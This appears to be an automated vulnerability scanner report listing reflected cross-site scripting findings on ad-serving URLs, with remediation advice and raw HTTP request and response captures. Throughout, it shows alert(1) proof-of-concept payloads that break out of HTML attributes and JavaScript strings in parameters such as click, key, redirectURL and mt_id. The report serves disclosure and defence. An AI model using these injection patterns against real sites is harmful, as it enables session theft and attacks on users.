Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8baf"><script>alert(1)</script>75e5e999f56 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bdac"-alert(1)-"77392b856f was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7397 Date: Tue, 28 Jun 2011 01:29:37 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3b34/f/1bc/%2a/t%3B240188907%3B0-0%3B0%3B63005625%3B4307-300/250%3B41751683/41769470/2%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0 ...[SNIP]...
The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2e9"-alert(1)-"dc78b75f8dd was submitted in the message parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7401 Date: Tue, 28 Jun 2011 01:29:48 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2 ...[SNIP]...
The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5275"-alert(1)-"ac334d801d8 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8 HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6515 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 01:29:50 GMT Expires: Tue, 28 Jun 2011 01:29:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8http://disneyland.disney.go.com/vacation-packages/spend-one-more-day/?CMP=BAC-DLRUSENFY11Q3DLRCTI0068"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var d ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d63"-alert(1)-"0029028972a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7425 Date: Tue, 28 Jun 2011 01:29:26 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bd/%2a/w%3B240188907%3B1-0%3B0%3B63005625%3B4307-300/250%3B42010411/42028198/1%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3 ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 955d3"-alert(1)-"79fca5d6b07 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83e6"-alert(1)-"517e13c6861 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7636"-alert(1)-"63cd2f45aaf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edf41"-alert(1)-"547d679179c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a14"-alert(1)-"5a45727816e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c057"-alert(1)-"6f219f1e3a4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf69"-alert(1)-"a746c5cd003 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35fd"-alert(1)-"5de782ce6f7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926de"-alert(1)-"6a870769378 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ef0"-alert(1)-"7fe67c3c10a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683c0"-alert(1)-"53404fc0cf5 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6039 Date: Tue, 28 Jun 2011 02:27:53 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8295b"-alert(1)-"0063854f767 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6039 Date: Tue, 28 Jun 2011 02:27:27 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e933c"-alert(1)-"2d7f11bea7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6035 Date: Tue, 28 Jun 2011 02:28:19 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var op ...[SNIP]...
1.19. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N6595.317091.MERKLEINC.COM/B5374569.11
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189ae"-alert(1)-"2f1dc89c1e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6051 Date: Tue, 28 Jun 2011 02:29:04 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c64cb"-alert(1)-"4e5a87e0f7b was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6039 Date: Tue, 28 Jun 2011 02:28:41 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 42%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7bhttp://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d18"-alert(1)-"a23769c2b50 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6039 Date: Tue, 28 Jun 2011 02:27:05 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519f1"-alert(1)-"cc5a0c33515 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6042 Date: Tue, 28 Jun 2011 02:25:53 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99772"-alert(1)-"2b722a970f9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6042 Date: Tue, 28 Jun 2011 02:25:28 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88227"-alert(1)-"fcf0b6f9d7d was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6042 Date: Tue, 28 Jun 2011 02:26:19 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var op ...[SNIP]...
1.25. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N6595.317091.MERKLEINC.COM/B5374569.5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613e3"-alert(1)-"21fa9330d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6054 Date: Tue, 28 Jun 2011 02:27:04 GMT
